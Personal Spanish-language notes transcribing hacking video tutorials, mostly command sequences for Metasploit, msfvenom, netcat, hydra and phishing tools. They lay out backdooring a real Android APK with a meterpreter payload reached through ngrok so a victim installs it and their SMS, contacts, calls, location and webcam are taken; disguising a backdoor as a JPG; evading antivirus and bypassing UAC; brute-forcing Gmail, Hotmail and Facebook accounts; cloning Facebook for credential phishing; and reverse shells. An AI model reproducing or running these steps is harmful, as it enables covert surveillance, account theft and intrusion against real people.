es bueno crear workspace para una red en particular
msf>workspace -h
msf>workspace -a webinario
msf>workspace
como se en workspace estoy trabajando… el que tiene el asterisco
msf>hosts
msf>creds
----credenciales
msf>notes
msf>vulns
msf>loot
osea este workspace está limpio para utilizar
msf>ifconfig
msf>workspace
msf>clear
identificar que hay dentro de nuestra red
msf>search -h
msf>search name:arp_sweep
msf>use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep)>
este video va por 1:08:46 horas
_________________________________________________________________________
esta pagina es parecida a nodistribute.com pero mejor
https://spyralscanner.net/
_________________________________________________________________________
Data Security
VIDEO EXTRACCIÓN DE CONTRASEÑAS
WIFI MEDIANTE CMD DESDE KALI LINUX
https://www.youtube.com/watch?v=lrtoTIKfzJo
ya el equipo debe de estar comprometido
meterpreter>sysinfo
meterpreter>getuid
Hay que tener privilegios de administrador para poder hacer esta extracción de
contraseñas wifi, osea elevar privilegios
meterpreter>shell
c:\WINDOWS\system32\netsh wlan show profile
Mostrar los perfiles de red inalámbricas a las que ese equipo se ha conectado
c:\WINDOWS\system32\netsh wlan show profile name=INFINITUM0934 key=clear
Muestra la contraseña de esta red
_________________________________________________________________________
OpErs LINUX
VIDEO CÓMO INYECTAR PAYLOAD EN
APK ORIGINAL CON METASPLOIT (FUERA
DE LA RED)
https://www.youtube.com/watch?v=G7tY7AnfnoU
se crea una cuenta en ngrok
https://ngrok.com/
https://dashboard.ngrok.com/user/signup
y lo descargamos
ls
./ngrok autoken y aqui va el codigo
abrimos 2 terminales
terminal 1: ifconfig
terminal 2: ./ngrok tcp 192.168.1.74:4444
terminal 1: cd Escritorio
clear
msfvenom -x Flow\ Free_v4.2_apkpure.com.apk -p android/meterpreter/reverse_tcp
LHOST=0.tcp.ngrok.io LPORT=15101 -o flow.apk
vamos a crear un archivo para automatizar algunos procesos
abrimos un editor de texto
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.74
set LPORT 4444
exploit
---ahora lo guarmos
guardar como
en el escritorio
colocar nombre: meterpreter.rc
clic en guardar
una vez creada el apk la vamos a copiar en
/var/www/html/descargas/flow.apk
activamos el apache
service apache2 start
192.168.1.74/descargas
o se puede subir a alguna nube para que la persona pueda descargarla
service apache2 stop
cuando ya la haya descargado
clear
ahora abrimos metasploit
msfconsole -r meterpreter.rc
ya con este archivo ya se ha puesto a la escucha para cuando la persona le de instalar a la
aplicacion apk
10:53 minutos
se activó una sesión
le damos enter
y nos sale
meterpreter>help
meterpreter>webcam_list
meterpreter>webcam_snap -i 1
meterpreter>help
meterpreter>check_root
no tenemos privilegios de root
descargar las llamadas
meterpreter>dump_calllog
descargar los contactos
meterpreter>dump_contacts
descargar mensajes
meterpreter>dump_sms
obtener la geolocalización del usuario
meterpreter>geolocate
abre la webcam en tiempo real
meterpreter>webcam_stream
esto si se traba la conexión
ctrl + z
background session 1
y
msf exploit(multi/handler)> sessions
msf exploit(multi/handler)> sessions -i 1
meterpreter>help
probamos con la segunda cámara
meterpreter>webcam_steram -i 2
ctrl + z
background session 1
y
msf exploit(multi/handler)> sessions -i 1
meterpreter>help
meterpreter>activity_start https://www.facebook.com
_________________________________________________________________________
Data Security
VIDEO ESCALAR PRIVILEGIOS CON
METASPLOIT
https://www.youtube.com/watch?v=myDvKC5ziVQ
msf>use exploit/multi/handler
msf exploit(handler)>set lhost 192.168.1.74
msf exploit(handler)>set lport 4444
msf exploit(handler)>exploit
meterpreter>sysinfo
meterpreter>getuid
Tengo permisos limitados
meterpreter>getsystem
Esto es para subir privilegios, pero a veces no funciona
Como hacemos: Vamos a utilizar un exploit en específico para elevar privilegios
meterpreter>background
Mandamos la sesión a segundo plano
msf exploit(handler)>
Abrimos una nueva terminal para buscar el exploit
msfconsole -q
msf>search uac
copiamos el que vamos a utilizar
Nos vamos a la otra terminal
msf exploit(handler)>use exploit/windows/local/ask
msf exploit(ask)>show options
msf exploit(ask)>set SESSION 1
msf exploit(ask)>set TECHNIQUE EXE
msf exploit(ask)>exploit
Va aparecer una ventana de control de usuarios vamos a dar clic en si
y ya nos mandó una segunda sesión de meterpreter pero con privilegios
meterpreter>sysinfo
meterpreter>getuid
sigo siendo usuario estandar
meterpreter>getsystem
Ahora sí subió el privilegio
meterpreter>getuid
ya sale SYSTEM
meterpreter>getsystem -h
meterpreter>getuid
_________________________________________________________________________
_________________________________________________________________________
Root-701
VIDEO Escalar Privilegios En Metasploit
(bypassuac) (Etical Hacking) (Modo
Exhaustivo)
https://www.youtube.com/watch?v=PaHWJwyYUzk
msfdb init
service postgresql start
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.74 LPORT=7777 -f exe
> /root/Escritorio/activadorwin10.exe
msfconsole -q
msf>use exploit/multi/handler
msf exploit(handler)>set ExitOnSession false
msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST 192.168.1.74
msf exploit(handler)>set LPORT 7777
exploit -j
cd /usr/share/metasploit-framework/
ls
cd data/post
clear
ls
En donde se está ejecutando el exploit.
El Payload debe de hacerse antes de la explotación
Bueno cuando le den doble clic al archivo exe ya se establece una conexión
msf exploit(handler)> sessions -i 1
meterpreter> upload /root/Escritorio/activadorwin10.exe C:\\Windows\\Temp
meterpreter> upload /usr/share/metasploit-framework/data/post/bypassuac-x86.exe
C:\\Windows\\Temp
meterpreter>shell
c:\Users\Cesar\Desktop>cd C:\Windows\Temp
c:\Windows\Temp>dir
c:\Windows\Temp>bypassuac-x86.exe elevate
ahora ya tenemos shell de admin
C:\Windows\System32>cd C:\Windows\Temp
C:\Windows\Temp> activadorwin10.exe
Se establece una segunda sesión
C:\Windows\Temp>exit
C:\Windows\Temp>exit
meterpreter>background
msf exploit(handler)> sessions -i
Me muestra las sesiones
msf exploit(handler)> sessions -i 2
meterpreter>getsystem
meterpreter>getuid
ahora soy SYSTEM
exit
exit
exit -y
_________________________________________________________________________
Data Security
VIDEO INFORMACIÓN INICIAL PARA
AUDITORIA DE SEGURIDAD WIFI
https://www.youtube.com/watch?v=7uBav8t6APU
podemos crear un archivo .rc para automatizar
lo creamos en el escritorio
entramos en la terminal
cd /root/Desktop/
msfconsole -q -r esploit.rc
bueno lo que contiene el archivo es exploit.rc es:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.74
set LPORT 4444
exploit -j
es importante tener permisos de administrador
sessions 2
meterpreter>getuid
aquí en esta sesión somos usuario SYSTEM osea administradores
meterpreter>clear
meterpreter>pwd
meterpreter> upload /root/Desktop/wifi.exe C\\Users\\Cesar\\Desktop
meterpreter>shell
C:\Users\Cesar\Desktop>dir
C:\Users\Cesar\Desktop>wifi.exe
este archivo wifi.exe me saca todas las wifi a las que se ha conectado con información
valiosa
con esto estamos haciendo auditoria en redes wifi
_________________________________________________________________________
Data Security
VIDEO DESCUBRIR SESIONES NULAS
HABILITADAS
https://www.youtube.com/watch?v=YxCce-5SYBM
primero abrimos la terminal y digitamos
netdiscover
vamos a coger una dirección la 192.168.0.8
hacemos un ping
ping 192.168.0.8
ahora vamos a comprobar si el puerto 445 está abierto
nmap -p445 --open -n 192.168.0.1/24
nmap -p445 --open -n 192.168.0.8
nos dice que se encuentra abierto
ahora vamos a averiguar cual es el sistema operativo de esa dirección ip
nmap --script smb-os-discovery.nse -p445 192.168.0.8
es un sistema operativo LINUX
Ahora cómo hacemos para saber si tiene sesiones nulas habilitadas
enum4linux -t 192.168.0.8
aquí arroja una gran información hay que tener paciencia
tenemos que revisar en donde dice session check. puede decir que username ‘’ y
password ‘’ osea que se pueden utilizar en blanco. tiene sesiones nulas habilitadas
_________________________________________________________________________
METASPLOITABLE
https://www.youtube.com/watch?v=cnRJhbYmgnQ
https://www.youtube.com/watch?v=vW-agN1t9Rg
Metasploitable 1
http://download.vulnhub.com/metasploitable/Metasploitable.zip
Metasploitable 2
https://sourceforge.net/projects/metasploitable/
colocar en youtube
metasploitable
_________________________________________________________________________
Backtrack Academy
VIDEO 15 Metasploit y virustotal
https://www.youtube.com/watch?v=1xuzeDor8rs
Ya debe de haber una sesión lista de meterpreter
meterpreter> upload /usr/share/windows-binaries/nc.exe c:\\docs
Bueno el antivirus no lo ha detectado
meterpreter>background
guardar la session
msf exploit(badblue_passthru)> search check_malware
Es un módulo de post explotación
msf exploit(badblue_passthru)>use post/multi/gather/check_malware
msf post(check_malware)> show options
msf post(check_malware)> set REMOTEFILE c:\\docs\\nc.exe
msf post(check_malware)> set session 3
msf post(check_malware)> show options
msf post(check_malware)> run
Bueno aquí empieza a revisarlos varios antivirus y lo detectan bastantes
Ahora lo que vamos hacer es utilizar otro archivo ncat
Sirve para tener acceso remoto al sistema
Descargamos el .zip
Lo movemos
mv Downloads/ncat-portable-5-59BETA1.zip /root/Desktop/
cd Desktop
ls
unzip ncat-portable-5-59BETA1.zip
cd ncat-portable-5-59BETA1
ls
Ahora vamos a la otra terminal de msf
msf post(check_malware)>sessions -i 3
meterpreter>upload /root/Desktop/ncat-portable-5-59BETA1/ncat.exe C:\\docs
meterpreter>background
msf post(check_malware)> use post/multi/gather/check_malware
msf post(check_malware)>show options
msf post(check_malware)> set REMOTEFILE c:\\docs\\ncat.exe
msf post(check_malware)> run
y este archivo son menos virus que lo detectan
_________________________________________________________________________
Hacking Libre
VIDEO Transferir archivos de Kali Linux a
Cualquier Máquina Rápido y Sencillo
https://www.youtube.com/watch?v=rstud24Wtlc&t=4s
en la parte donde me encuentre van aparecer los archivos y carpetas para descargar
y digito en la terminal:
python -m SimpleHTTPServer 3030
_________________________________________________________________________
Backtrack Academy
VIDEO HackLab - Técnicas de recolección
de información
https://www.youtube.com/watch?v=TCiTexMKfHU
_________________________________________________________________________
Backtrack Academy
VIDEO 11 Pivoting accediendo a lugares
no autorizados
https://www.youtube.com/watch?v=6NYmIrRUDG4
_________________________________________________________________________
_________________________________________________________________________
Backtrack Academy
VIDEO HackLab - Post-Explotación con
meterpreter
https://www.youtube.com/watch?v=HYjo1ui0EFw
_________________________________________________________________________
Tutoriales gnu linux
VIDEO Como instalar y configurar,
metasploitable 2 en virtualbox
https://www.youtube.com/watch?v=iMAjLA8UywM
Metasploitable 2 es un servidor en modo terminal de ubuntu en el cual presenta muchas
vulnerabilidades para poder hacer las prácticas y aprender mucho, en un medio
controlado como lo es virtualbox.
vamos a instalar metasploitable en virtualbox
lo descargamos de internet
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
bueno yo no lo voy a descargar porque ya lo tengo
Una vez se haya descargado abrimos virtualbox
tenemos que descomprimir metasploitable 2
clic derecho extraer
nos vamos a virtualbox
clic en nueva
le colocamos un nombre: metasploitable 2
El tipo de sistema es Linux
en versión elegimos other linux 64bits
clic en siguiente
elegimos la memoria ram: 512 MB
clic en siguiente
clic en usar un archivo de disco duro virtual existente
y buscamos el archivo de metasploitable 2
y escogemos el tiene extensión .vmdk
lo seleccionamos y le damos clic en abrir
clic en crear
Ahora vamos a configurar algo mas para que quede lista la máquina virtual
seleccionamos la máquina virtual metasploitable 2
y clic en configuración
en general, clic en avanzado:
compartir portapapeles: bidireccional
arrastrar y soltar: bidireccional
En sistema en la pestaña procesador: debe de estar marcada la opción Habilitar PAE
Ahora clic en Red
Conectado a: Adaptador puente
en donde dice nombre: elegimos wlan0 esto es para escoger la interfaz de red
clic en avanzadas
en tipo de adaptador elegimos el penúltimo el que dice server
en Modo promiscuo elegimos permitir todo y ya tenemos todo configurado
clic en aceptar
y ahora clic en iniciar
Ahora que ya arrancó debemos de colocar El usuario y la contraseña que en este caso es
msfadmin las dos
_________________________________________________________________________
Carlitostv tutoriales
VIDEO Cómo descifrar contraseñas
usando john the ripper en kali linux 2019
https://www.youtube.com/watch?v=cH4dPVKDEJY
Crakeador John de Riper
Veremos como crakear la contraseña de un usuario, utilizando la herramienta john the
riper.
Se llama John el destripador por que literalmente destripa un archivo que contiene la
información de /etc/passwd y /etc/shadow
para comparar las contraseñas con el diccionario que tiene Jonh de Riper.
unshadow /etc/passwd /etc/shadow > ataque.txt
john --format=sha512crypt ataque.txt
Bueno comencemos
crearemos un nuevo usuario y contraseña
useradd maria
passwd maria
digitar la contraseña 2 veces
una vez creado el usuario comenzamos a usar la herramienta
unshadow /etc/passwd /etc/shadow > ataque.txt
esto nos crea un archivo con la información de esos dos archivos
ahora ejecutamos el John de Riper
john --format=sha512crypt ataque.txt
como podemos ver crakeo la contraseña
podemos agregar mas contraseñas
cd /usr/share/john
ls
nano password.lst
_________________________________________________________________________
HackerSploit
DNS Zone Transfer Tutorial - Dig,
Nslookup & Host
https://www.youtube.com/watch?v=kdYnSfzb3UA
host -t ns zonetransfer.me
host -l zonetransfer.me nsztm1.digi.ninja
dig zonetransfer.me -t ns
dig axfr zonetransfer.me @nsztm1.digi.ninja.
nslookup
>set type=ns
>zonetransfer.me
bueno en una consola de windows
nslookup
>server nsztm1.digi.ninja
>set type=any
>ls -d zonetransfer.me
regresamos a kali
ctrl + c
dnsrecon -d zonetransfer.me -t axfr
_________________________________________________________________________
ParrotSec School
VIDEO 09 - Tutorial de netcat
https://www.youtube.com/watch?v=JvSDU5ZqVs8
Función de netcat para ver puertos abiertos o cerrados
Puerto HTTP
nc -nv 192.168.1.74 80
Nos dice que si está abierto. Le mandamos una comilla(‘) para ver cómo responde el servidor
Puerto FTP
nc -nv 192.168.1.74 21
clear
Puerto SMTP correo
nc -nv 192.168.1.74 25
FUNCIÓN DE NETCAT PARA CHAT
Esto en el servidor
nc -nvlp 4444
Ahora en el cliente osea en otra terminal
nc -nv 192.168.1.74 4444
Ahora en el servidor digito
Desde el servidor
y ahora en el cliente
Desde el cliente
OTRA FUNCIÓN DE NETCAT ES TRANSFERIR ARCHIVOS
Hay que crear un archivo en el cliente Enviar_archivo.txt
Esto es el servidor
nc -nvlp 4444 > archivo_recibido.txt
En el cliente
nc -nv 192.168.1.74 4444 < Enviar_archivo.txt
Ahora desde el servidor
cat archivo_recibido.txt
Ahora también esto se puede hacer con windows
C:\Users\Jhon\Desktop>dir
allí está nc.exe
C:\Users\Jhon\Desktop>cls
Esto es en windows
C:\Users\Jhon\Desktop>nc -nvlp 4444
Esto es en Kali
nc -nv 192.168.1.75 4444
Hola desde Kali linux
Hola desde Windows 10
NETCAT NOS PERMITE ADMINISTRAR UN SISTEMA DE FORMA REMOTA
una bin shell
En windows
nc -nvlp 4444 -e cmd.exe
En kali
nc -nv 192.168.1.75 4444
Cuando la conexión se establece recibimos la shell de windows
C:\Users\Jhon\Desktop>systeminfo
PODEMOS ENVIAR UNA REVERSE SHELL DESDE KALI LINUX A WINDOWS
En windows
nc -nvlp 4444
En kali
ncat -nv 192.168.1.75 4444 -e /bin/bash
Cuando Kali se conecte a windows. Windows va a ejecutar comandos /bin/bash
Ahora estando en windows si ejecutamos
whoamy
pwd
ncat es una versión mejorada de nc, tiene más opciones
ncat --help
Si nosotros utilizamos nc así solo cualquier snnifer puede descifrar nuestra información
Por eso vamos a utilizar ncat para encriptar nuestra información
Esto en el servidor kali
ncat -lvp 4444 -e /bin/bash --ssl --allow 192.168.1.75
Esto en el cliente
ncat -v 192.168.1.74 4444 --ssl
ahora en el cliente ejecutamos
whoamy
id
exit
ctrl + c
Ahora colocamos la dirección ip que queremos permitir acceso
ncat -lvp 4444 -e /bin/bash --ssl --allow 192.168.1.80
Si el cliente ahora desea conectarse no va a poder porque no tiene permiso
ADEMÁS PODEMOS EJECUTAR UNA SHELL REVERSA DESDE EL SISTEMA CLIENTE HACIA KALI
En kali
ncat -lvp 4444 --ssl --allow 192.168.1.75
En el cliente
ncat -v 192.168.1.74 4444 --ssl -e /bin/bash
Al ejecutar en Kali
whoamy
pwd
_________________________________________________________________________
PiensaEnHacking
VIDEO curso hacking - netcat
https://www.youtube.com/watch?v=obDljL2LguA
_________________________________________________________________________
PiensaEnHacking
VIDEO netcat windows
https://www.youtube.com/watch?v=6UXu4hbr-FY
_________________________________________________________________________
Hacking Ético León
VIDEO Crear Diccionario de Contraseñas |
Cupp | HEL
https://www.youtube.com/watch?v=RdwSu1E4wT8
Nos dirigimos a https://github.com/Mebus/cupp
Ahora en la terminal
git clone https://github.com/Mebus/cupp.git
cd cupp
ls
./cupp.py
./cupp.py -i
>First Name: juan
>Surname: lozano
>Nickname: Juanito
>Birthdate: 10061998
>Partners) name: Maria
>Partners) nickname: Mary
>Partners) birthdate: 23051998
>Child’s name:
>Child’s nickname:
>Child’s birthdate
>Pet’s name: rufo
>Company name: juanitocompany
Colocar palabras claves de la victima: Y
Futbol, Barcelona, Playstation
Agregar caracteres especiales al final de las palabras
Y
Números random
Y
leet mode
Y
cat juan.txt
_________________________________________________________________________
Jey Zeta
VIDEO ShellFinder, la herramienta para
encontrar web shell en los servidores
https://www.youtube.com/watch?v=wh763ONd-Y8
nos vamos a github
https://github.com/HackingEnVivo/ShellFinder
git clone https://github.com/HackingEnVivo/ShellFinder.git
Requerimientos tener perl instalado
cd ShellFinder
ls
./shellfinder.pl
o
shellfinder.pl
> Aquí colocamos la url
>https://cemex.com
bueno allí empieza a escanear en busca de la webshell
cuando la encuentra es en forma de link, ese link lo copiamos y lo pegamos en el
navegador y ya podemos ver la información.
_________________________________________________________________________
Jey Zeta
Subiendo web shell y haciendo Deface
https://www.youtube.com/watch?v=Df8CQlBCPGU
una vez encontrado la webshell en la url, entonces desde allí podemos subir un index.html
_________________________________________________________________________
HackerSploit
DMitry - Passive Information Gathering
https://www.youtube.com/watch?v=z2EUhV11QB4
dmitry --help
dmitry -i 192.168.0.1
Domain: dmitry -w zonetransfer.me
Puertos: dmitry -p 192.168.1.1
netcraft: dmitry -n hsploit.com
dmitry -e zonetransfer.me
dmitry -e bbc.com
dmitry -i 192.168.1.1 -o resultadosdmitry.txt
cat resultadosdmitry.txt
dmitry -wnpe hsploit.com -o resultadodmitry2.txt
_________________________________________________________________________
Error 404 Not Found
Inyectar payload en apk Original fuera de la
red local
https://www.youtube.com/watch?v=xu8HBwr_HoA
_________________________________________________________________________
Data Security
CREAR BACKDOORS EXE TOTALMENTE
INDETECTABLES COMPROBADO
https://www.youtube.com/watch?v=1VrrrQzs8HM
1. git clone https://github.com/Screetsec/TheFatRat.git
2. cd TheFatRat
3. chmod +x setup.sh && ./setup.sh
4.
5.
6.
7.
8.
Extract The lalin-master to your home or another folder
chmod +x fatrat
chmod +x powerfull.sh
And run the tools ( ./fatrat )
Easy to Use just input your number
./fatrat
enter para continuar
La herramienta cuenta con 13 módulos
vamos a elegir el 2 para crear el backdoor indetectable
enter
set LHOST IP: 192.168.1.8
set LPORT 4444
y esperamos que se cree el archivo backdoor
el archivo se encuentra en la carpeta output de fatrat
hay que copiarla al escritorio
y despues pasarla a nodistribute.com
_________________________________________________________________________
Data Security
OCULTAR UN BACKDOOR TRAS UNA IMAGEN
COBAL STRIKE
https://www.youtube.com/watch?v=uQzprfJsTzI
_________________________________________________________________________
TrblTech
Como poner un backdoor en cualquier
aplicacion | ANDROID
https://www.youtube.com/watch?v=kHqBui9uSgo
_________________________________________________________________________
Lucho Nethunter
Ataque de fuerza bruta a Gmail con hydra
https://www.youtube.com/watch?v=sJlQbyY9mYk
hydra -S -l [email protected] -P /root/Escritorio/password.txt -e ns -V -s 465
smtp.gmail.com smtp
Para este ataque sería bueno tener una vpn o un proxy
el gmail y otros servidores cuando le están haciendo ese ataque
_________________________________________________________________________
Cyber Akuma
Fuerza Bruta a mysql con hydra - Kali
Linux
https://www.youtube.com/watch?v=1yTCDiGfa8M
nmap 192.168.1.163
xhydra
Pestaña Target
en single target: 192.168.1.163
en port: 3306
en protocol: mysql
activar show attemps
activar Be Verbose
Pestaña Password
Username List : /root/Escritorio/users.txt
Password List: /root/Escritorio/pass.txt
Activar try login as password
Activar Try empty password
Activar Try reverse login
Pestaña Tunnig
Number of tacks: 1
timeout: 32
no proxy
Pestaña Start
clic en el botón start
ahora ya la encontró
probamos abriendo otra terminal
mysql -h 192.168.1.163 -u root
Pueden haber muchos ataques con hydra:
ftp, http, smtp, telnet, mysql, router, rdp, ssh
_________________________________________________________________________
Stalin Maza
Ataque de Fuerza Bruta con Hydra | Kali
Linux | Dani | 2018
https://www.youtube.com/watch?v=Q0UG5L3slDU
Creamos el diccionarioSeguridad.txt
nano diccionarioSeguridad.txt
y digitamos lo siguiente
password
root
user
admin
administrador
stalin
sam
ctrl + o
ctrl + x
hydra -L diccionariosSeguridad.txt -P diccionarioSeguridad.txt -f attack.samsclass.info
http-get /brute0/
_________________________________________________________________________
Team Whoami
medusa e hydra facebook gmail hotmail
ftp ssh
https://www.youtube.com/watch?v=Pd2fTPZNCN0
Utilización de fuerza bruta
herramientas a utilizar medusa e hydra
las cuentas que se van a atacar son ftp, ssh, hotmail, gmail, facebook
las de ftp y ssh las vamos a probar en la máquina de metasploitable 2
Debemos de activar esa máquina virtual de metasploitable 2
usuario: msfadmin
contraseña: msfadmin
Vamos a trabajar con hydra
hydra
Antes de utilizar hydra vamos a ver una herramienta que se llama crunch para crear
diccionarios de datos
DICCIONARIO
crunch
hay que colocar el largo de caracteres como mínimo y el largo de caracteres como
máximo
crunch 5 5
después se colocan los caracteres que voy a utilizar
crunch 5 5 aw72@ > /root/Escritorio/dic_prueba.txt
es un diccionario corto
otro
crunch 5 9 aw#n72@ > /root/Escritorio/dic_prueba2.txt
ahora manualmente vamos a generar un diccionario con un editor de texto
los valores a ingresar son:
perro
gato
perro318579
rinoceronte
1243567698
y lo guardo con el nombre de:
dic_fb.txt
ahora utilizar el hydra
hydra -s 443
-l podemos un usuario en específico
-L colocamos una lista de usuarios que esten en un diccionarioUsuarios.txt
-p es para el password si lo sabemos
-P si es de una lista
-f a que pagina vamos a atacar
hydra -s 443 -l perro
hydra -s 443 -L /root/Escritorio/listaUsuario.txt
HYDRA ATAQUE A FACEBOOK
hydra -s 443 -l [email protected] -P /root/Escritorio/dic_fb.txt -f www.facebook.com httpsget
y enter
puede darse el caso que la fuerza bruta en facebook no funciona porque el tiene mucha
seguridad con referente a estos ataques
cuando se hacen muchas peticiones a una misma cuenta el facebook bloquea y nos puede
dar un falso positivo, como así: que nos puede arrojar una contraseña que no es.
Entonces hydra no funciona con facebook
HYDRA ATAQUE A FTP
bueno en el archivo que se creó llamado dic_fb.txt colocamos otra palabra msfadmin
hydra -l msfadmin -P /root/Escritorio/dic_fb.txt 192.168.0.22 ftp
y aquí si la encuentra y ya no es un falso positivo
usuario: msfadmin y contraseña: msfadmin
si queremos comprobar si es verdad hacemos un ftp a esa ip
ftp 192.168.0.22 21
nos pide el name: msfadmin
y el password: msfadmin
y se conecta:
ftp>ls
ftp>exit
HYDRA ATAQUE A SSH
hydra -l msfadmin -P /root/Escritorio/dic_fb.txt 192.168.0.22 ssh
tambien el usuario y la contraseña es msfadmin
para ver si es verdad
ssh [email protected]
y le colocamos la clave que es msfadmin
y nos sale un shell de linux
con acceso total al sistema
exit
HYDRA ATAQUE A GMAIL
hydra -S -l [email protected] -P /root/Escritorio/dic_fb.txt -s 465
smtp://smtp.gmail.com
En este caso funcionó perfectamente
MEDUSA ATAQUE A HOTMAIL
medusa
medusa -h smtp.live.com -u [email protected] -P /root/Escritorio/dic_fb.txt -M smtp
Aquí pues hotmail también detecta cuando hay muchas peticiones por fuerza bruta y
manda error
MEDUSA ATAQUE A FTP
medusa -u msfadmin -P /root/Escritorio/dic_fb.txt -h 192.168.0.22 -M ftp
MEDUSA ATAQUE A SSH
medusa -u msfadmin -P /root/Escritorio/dic_fb.txt -h 192.168.0.22 -M ssh
por fuerza bruta es poco ineficiente, porque las claves son robustas
La fuerza bruta es un poco tedioso
Es bastante inestable
ataques reales desencriptar los hashes luego de obtener las bases de datos mediante un
sql injection o mediante la obtención de los hashes de Windows, de Mac, de Linux para su
posterior crackeo y obtención de la contraseña
_________________________________________________________________________
HackWise
Las 7 herramientas de H4cking más
utilizadas en Kali Linux
https://www.youtube.com/watch?v=UKkMP2UFs_s
7 Aircrack-ng:
6 Metasploit
5 BeEF
4 Hydra
3 John the Ripper
2 Wireshark
1 Burp Suite
_________________________________________________________________________
Data Security
IMPLANTAR BACKDOOR EN UN APK
ORIGINAL
https://www.youtube.com/watch?v=Mz1cguXu5k0&t=6s
_________________________________________________________________________
Data Security
OCULTAR BACKDOOR EN FOTOGRAFÍA
https://www.youtube.com/watch?v=og7ZqPmOhKY
que necesitamos el backdoor, una foto, winrar y toyicon
Ejecutamos toy icon
este lo que hace es que convierta la imagen en un icono, la imagen original es de
extensión jpg.
Arrastramos la imagen a la cajita y automáticamente se crea otro archivo con extensión
.ico, si le damos clic derecho propiedades vemos que en verdad es un icono
Cerramos toyicon
Ahora al archivo .ico le cambiamos el nombre a icono
Ahora vamos a modificar la puerta trasera con winrar
clic derecho a la puerta trasera
añadir al archivo
Pestaña General
le cambiamos el nombre al archivo: autoFino.jpg
método de compresión: la mejor
Marcar: crear un archivo autoextraible
Clic en la Pestaña Avanzado
Clic en el botón autoextraible
se nos abre una ventana que dice opciones SFX avanzadas
Clic en la pestaña Actualizar
Clic en extraer y actualizar ficheros
Clic en Sobrescribir todos los ficheros
Clic en la pestaña instalación
Donde dice Ejecutar tras la extracción allí colocamos el nombre del backdoor
virus.exe
y donde dice Ejecutar antes de la extracción colocamos
autoFino.jpg
Clic en la pestaña Texto e icono
Clic en el segundo botón de examinar y buscamos el icono que creamos al inicio
Clic en la pestaña de modos
Clic en ocultar todo
Clic en aceptar
Clic en aceptar
y así se genera un archivo con extensión jpg. es bastante indetectable para las personas
normales.
Cuando a ese archivo se le dé doble clic la foto se verá pero también se ejecuta el
virus.exe, y se establecerá una sesión en kali linux.
En kali linux debe de estar el handler listo y a la escucha
La foto después de verla la pueden cerrar pero no se pierde la sesión que es lo mas
interesante.
_________________________________________________________________________
Data Security
RECUPERAR SESIÓN ROOT EN KALI
LINUX
https://www.youtube.com/watch?v=Mp2boeZK3k4
Cuando no sabemos la clave de Linux podemos hacer una estrategia para cambiarla:
cuando ingresamos la contraseña y no funciona, debemos de reiniciar la máquina
Nos vamos a advanced options, le damos enter y presionamos la letra e
debemos de buscar una línea con las teclas de flechas que comience con linux y termine
en quiet.
estando en quiet borramos hacia atrás y llegamos a ro.
borramos la o
y a la r le anexamos la w osea
ro
por
rw init=/bin/bash
después de bash dejamos un espacio y presionamos la tecla f10 y se reinicia la máquina
para entrar en modo terminal
nos a parecer lo siguiente
root@(none):/#
y ahora digitamos lo siguiente:
root@(none):/# passwd
ahora escribimos una nueva contraseña:
12345
12345
ahora reiniciamos la máquina con
reboot -f
Ahora podemos entrar con el usuario root y la nueva contraseña
_________________________________________________________________________
Xecure Labs
Fundamentos de Metasploit Framework ||
Curso de Metasploit - Desde 0 hasta
Avanzado || Gratis
https://www.youtube.com/watch?v=Ap9mfbmOrLM
_________________________________________________________________________
Evitar que el servicio de actualizaciones
de Windows 10 se inicie con el sistema
Las actualizaciones de Windows 10 se comportan como cualquier
proceso. Lo que hay que hacer es impedir que se inicie con el
sistema, y para ello es necesario seguir los siguientes pasos:
● Pulsa la tecla de Windows + R, escribe services.msc en la
barra de ejecución y pulsa la tecla Enter.
● En la lista de procesos localiza el de Windows Update y
ábrelo clicando en él.
● Para desactivarlo, en la pestaña General, busca el campo
"Tipo de incio" y cámbialo a "Deshabilitado".
● Reinicia el PC y las actualizaciones automáticas habrán
pasado a la historia.
Si en algún momento quieres volver a activarlas basta con volver a
seguir estos pasos y cambiar el tipo de inicio a "Automático".
_________________________________________________________________________
Data Security
ASÍ ES COMO LOS HACKERS TE ROBAN
TUS CONTRASEÑAS
https://www.youtube.com/watch?v=3vKOiRxKqeE&t=473s
debemos de entrar a una página web
https://ngrok.com
allí en ella nos registramos pero usando una cuenta de correo temporal
https://temp-mail.org
https://emailtemporal.org
https://www.mailinator.com
bueno después que active el correo temporal me registro en ngrok.com y me descargo
el ngrok y sigo los pasos para configurarlo
en la terminal
./ngrok http -bind-tls=true 8080
Abrimos otra terminal
cd weeman
ls
./weeman.py
show
set url https://www.facebook.com
set port 8080
set action_url aquí va la url de ngrok https
show
run
_________________________________________________________________________
Álvaro Solás
Post explotación con Meterpreter,
escalada de privilegios y obtención de
hashes
https://www.youtube.com/watch?v=OK-HDvHc_2o
_________________________________________________________________________
Descargar